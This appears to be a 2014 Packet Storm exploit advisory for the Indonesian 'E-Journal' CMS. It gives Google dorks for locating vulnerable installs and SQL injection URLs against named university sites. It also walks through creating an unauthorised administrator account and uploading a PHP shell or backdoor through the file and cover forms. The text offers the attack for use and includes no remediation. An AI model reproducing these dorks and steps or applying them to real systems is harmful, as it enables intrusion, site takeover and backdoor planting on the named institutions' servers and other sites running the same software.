E-Journal version 1.0 suffers from remote shell upload, privilege escalation, and remote SQL injection vulnerabilities.
1894ccb36158f5e94c713534272cd9f288e7404d8bf5fe85c3a1409eebbdaca6==========================================================================================
E-Journal (Old Version) Multiple Vulnerabilities
==========================================================================================
:-------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : E-Journal (Old Version) Multiple Vulnerabilities
: # Date : 17th December 2014
: # Author : X-Cisadane
: # CMS Developer : http://simlitabmas.dikti.go.id/ejournal/
: # Version : Old Version
: # CMS Language : Indonesian
: # Category : Web Applications
: # Vulnerability : SQL Injection, Privilege Escalation and File Upload Vulnerability
: # Tested On : Google Chrome Version 39.0.2171.95 m (Windows 7 Ultimate 32-Bit English)
: # Greetz to : X-Code YogyaFree, Explore Crew, CodeNesia, Bogor Hackers Community, Tomi Zaoldyeck and Winda Utari
:-------------------------------------------------------------------------------------------------------------------------:
DORKS (How to find the target) :
================================
inurl:mahasiswa.php intitle:E-Journal
inurl:dosen.php intitle:E-Journal
inurl:jurnal.php intitle:E-Journal
inurl:dokumen.php intitle:E-Journal
"Karya Tulis Mahasiswa" intitle:E-Journal
"Design & Programming by" intitle:E-Journal
"E-Journal adalah aplikasi berbasis web untuk"
Or use your own Google Dorks :)
P.S : This E-Journal CMS has 2 versions, The Old Version doesn't have informasi.php (Informasi Menu).
Proof of Concept
================
[ 1 ] SQL Injection
POC :
http://[Site]/[Path]/jurnal.php?detail=jurnal&id=['SQLi]
Example :
http://e-journal.uniga.ac.id/jurnal.php?detail=jurnal&id='133
http://www.ejournal-fkipunibba.com/jurnal.php?detail=jurnal&id='133
http://e-journal.uika-bogor.ac.id/jurnal.php?detail=jurnal&id='133
http://ejurnal.unjani.ac.id/jurnal.php?detail=jurnal&id='133
http://ejournal.stikesborromeus.ac.id/jurnal.php?detail=jurnal&id='133
...etc...
[ 2 ] Privilege Escalation
You can create a new Administrator Account by Using this Trick.
For Example my Target is : http://www.ejournal-fisipunla.com/
Step 1 : Add data.php?tambah=dosen in the URL
So in this case the URL was http://www.ejournal-fisipunla.com/data.php?tambah=dosen
Step 2 : Then you can see this notice : "ANDA TIDAK BERHAK MENGAKSES HALAMAN INI. SILAHKAN ANDA LOGIN SEBAGAI ADMINISTRATOR".
Ignore that Notice and click Admin Menu.
Screenshot #1 : http://i59.tinypic.com/54he2b.png
Step 3 : Tadaaa... Now you can add an Administrator Account.
Screenshot #2 : http://i59.tinypic.com/2i8vyus.png
[ 3 ] Upload PHP File (PHP Shell / Backdoor)
After New Administrator Account was Created, you can logon as an Administrator and Upload a Php File.
Admin Control Panel Path : http://[Site]/[Path]/admin.php
Example : http://www.ejournal-fisipunla.com/admin.php
Then Upload your PHP Shell / Backdoor from http://[Site]/[Path]/data.php?tambah=dosen
Upload your Php File in the File and Cover form.
Screenshot #3 : http://i59.tinypic.com/24cxhrc.png
Open your Backdoor / PHP Shell in :
http://[Site]/[Path]/cover/your php file name.php
http://[Site]/[Path]/file/your php file name.php
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed